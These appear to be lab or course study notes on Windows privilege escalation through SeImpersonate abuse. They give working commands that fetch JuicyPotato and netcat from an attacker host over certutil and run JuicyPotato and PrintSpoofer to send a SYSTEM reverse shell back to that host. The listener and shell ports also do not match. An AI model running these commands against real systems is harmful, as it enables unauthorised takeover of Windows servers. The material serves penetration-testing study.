SeImpersonate and SeAssignPrimaryToken
In Windows, every process has a token that contains information about the particular account that is running it.
these tokens are not considered secure resources, as they are simply just locations in memory that could be brute-forced by users who cannot read memory.
To utilize the token, the
SeImpersonateprivilege is needed.
Legit programs may utilize another process 's token to escalate from administrator to Local system, Processes generally do this by making a call to the WinLogon process to get a SYSTEM token, then executing itself with that token placing it within the SYSTEM space
Often attackers abuse the
SeImpersonateprivilege using a "potato style (juicy potato)" privilege escalations, where a service account canSeImpersonate, but not obtain full SYSTEM level privileges.Pretty much the "Potato" attack tricks the process running as SYSTEM to connect to their process, which hands over the token to be used
we will often find the SeImpersonate privilege enabled
After gaining remote execution via an application that runs in the context of a service account, think like Jenkins, executing commands through mmsql, ASP/ASPX web shells through a web application)
SeImpersonate Example - juicyPotato
scenrio: we have gained an intial foot-hold within the mssql server, The SQL service account is running in the context of the default mssqlserver account, we have acheived command execution through xp_cmdshell using a set of creds we found in a login.sql file on a file share using the snaffer tool
Connecting to the SQL server instance and confirm our privileges
sudo python2 /opt/impacket-0.9.19/examples/mssqlclient.py sql_dev@10.129.43.43 -windows-authenable xp_cmdshell
enable_xp_cmdshell
Lets check our account privileges
xp_cmdshell whoami /priv
we can see we have the
SeImpersonateprivilege enabledwe can utilize
SeImpersonateto impersonate a privileged account such asNT AUTHORIT/SYSTEMwe can utilize juicy potato to exploit the
SeImpersonateor theSeAssignPrimaryTokenprivileges via DCOM/NTLM reflection abuse
exploiting
SeImpersonatewith juicyPotato
lets download the juicyPotato binary from https://github.com/ohpe/juicy-potato/releases
sudo wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exeLets upload both our juicyPotato and nc64.exe, in our mssql session
xp_cmdshell certutil.exe -urlcache -f http://10.10.14.91/JuicyPotato.exe jc.exe
xp_cmdshell certutil.exe -urlcache -f http://10.10.14.91/nc64.exe nc.exeLets start a netcat listener
rlwrap -cAr nc -lvnp 9010Lets execute jc.exe (juicyPotato)
xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.91 9001 -e cmd.exe" -t *-l: is the COM server listening port, a COM server is an executable (EXE or DLL) that implements a set of COM objects and follow standard COM rules to communicate with on another-p: is the program to launch (cmd.exe)-a: is the argument passed to cmd.exe-t: is the createprocess call, we can see we specified*meaning try bothCreateProcessWithTokenW(SeImperonate priv) andCreateProcessAsUser(SeAssignPrimaryToken)
Look back at our listener we have a shell as nt authority\system
PrintSpoofer and RoguePotato
JuicyPotato doesnt work on windows server 2019 and windows 10 build 1809 onwards
However PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access
these tools can be used to abuse imperonation privileges on Windows 10 and server 2019
Escalating privileges using PrintSpoofer
we can use this tool to spawn a SYSTEM process in our current console and interact with it, spawn a SYSTEM process on Desktop (if we are utilizing RDP or logged on locally), or even catch a reverse-shell
Again we will connect with impackets mssqlclient
xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.91 9001 -e cmd.exe"-c: argument to execute, in our case we want to establish a reverse-shell with nc.exe
Last updated